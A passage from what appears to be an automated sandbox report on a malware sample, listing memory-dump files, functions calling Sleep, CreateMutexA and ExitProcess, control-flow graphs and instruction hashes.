                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                              • Opcode ID: fe116881c1b4a9ef0c32aa96b3c844bcdc665b6f2ab0c690f846dd5fbe351fd8
                                                                                                                                                                                                                              • Instruction ID: e4c02927af545296b6742c675fee2e26fa75d98c0945deee474f29adc5963fa3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe116881c1b4a9ef0c32aa96b3c844bcdc665b6f2ab0c690f846dd5fbe351fd8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48E08C30501208AECF26BF68DC29F993B29EF41785F004810F828472A2CB25EE91DA90
                                                                                                                                                                                                                              Function 00BD9BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: e86788e191ee37603829989360c858407e8f7bb8073f765065121135317b2363
                                                                                                                                                                                                                              • Instruction ID: c37a73b19098994ad50b3a6b059bdde68aee229237c22f659c4c1d35ae3e57f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e86788e191ee37603829989360c858407e8f7bb8073f765065121135317b2363
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76315B317141409BEB08EB7CDC9575DFBE2DBC5314F24829AE014973E6E77A99808751
                                                                                                                                                                                                                              Function 00BD9F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 22 bd9f44-bd9f64 26 bd9f66-bd9f72 22->26 27 bd9f92-bd9fae 22->27 28 bd9f88-bd9f8f call bed663 26->28 29 bd9f74-bd9f82 26->29 30 bd9fdc-bd9ffb 27->30 31 bd9fb0-bd9fbc 27->31 28->27 29->28 32 bda92b 29->32 36 bd9ffd-bda009 30->36 37 bda029-bda916 call be80c0 30->37 34 bd9fbe-bd9fcc 31->34 35 bd9fd2-bd9fd9 call bed663 31->35 39 bda953-bda994 Sleep CreateMutexA 32->39 40 bda92b call c06c6a 32->40 34->32 34->35 35->30 43 bda01f-bda026 call bed663 36->43 44 bda00b-bda019 36->44 52 bda9a7-bda9a8 39->52 53 bda996-bda998 39->53 40->39 43->37 44->32 44->43 53->52 54 bda99a-bda9a5 53->54 54->52
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 6db040202546a34d2011e3d0e0b9356b6fb0caa53b798cb1bceca280563f4f7a
                                                                                                                                                                                                                              • Instruction ID: ea2e68bb89101b844007209a92db596f7aaa3543a0c0e7d53c1509125ca934b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6db040202546a34d2011e3d0e0b9356b6fb0caa53b798cb1bceca280563f4f7a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F3148716041409BEB08EB79DC947ADF7E2EBC5314F20869AE418D73D1E77AA9808752
                                                                                                                                                                                                                              Function 00BDA079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 56 bda079-bda099 60 bda09b-bda0a7 56->60 61 bda0c7-bda0e3 56->61 62 bda0bd-bda0c4 call bed663 60->62 63 bda0a9-bda0b7 60->63 64 bda0e5-bda0f1 61->64 65 bda111-bda130 61->65 62->61 63->62 68 bda930-bda994 call c06c6a Sleep CreateMutexA 63->68 70 bda107-bda10e call bed663 64->70 71 bda0f3-bda101 64->71 66 bda15e-bda916 call be80c0 65->66 67 bda132-bda13e 65->67 72 bda154-bda15b call bed663 67->72 73 bda140-bda14e 67->73 86 bda9a7-bda9a8 68->86 87 bda996-bda998 68->87 70->65 71->68 71->70 72->66 73->68 73->72 87->86 88 bda99a-bda9a5 87->88 88->86
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 019de4755a106cd27fec70c3d58adcd40f9c8b58c6376c1d8ae19ba2636ea680
                                                                                                                                                                                                                              • Instruction ID: 394b35c442bd7c9d534d7481319108a74f5d31e0ad89ad6573669cb71d03c1ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 019de4755a106cd27fec70c3d58adcd40f9c8b58c6376c1d8ae19ba2636ea680
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C33168317141409BEB08EB78DCC576DF7E2DBC6314F24829AE014A73D1E77A99808756
                                                                                                                                                                                                                              Function 00BDA1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 90 bda1ae-bda1ce 94 bda1fc-bda218 90->94 95 bda1d0-bda1dc 90->95 96 bda21a-bda226 94->96 97 bda246-bda265 94->97 98 bda1de-bda1ec 95->98 99 bda1f2-bda1f9 call bed663 95->99 102 bda23c-bda243 call bed663 96->102 103 bda228-bda236 96->103 104 bda267-bda273 97->104 105 bda293-bda916 call be80c0 97->105 98->99 100 bda935 98->100 99->94 108 bda953-bda994 Sleep CreateMutexA 100->108 109 bda935 call c06c6a 100->109 102->97 103->100 103->102 111 bda289-bda290 call bed663 104->111 112 bda275-bda283 104->112 120 bda9a7-bda9a8 108->120 121 bda996-bda998 108->121 109->108 111->105 112->100 112->111 121->120 122 bda99a-bda9a5 121->122 122->120
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
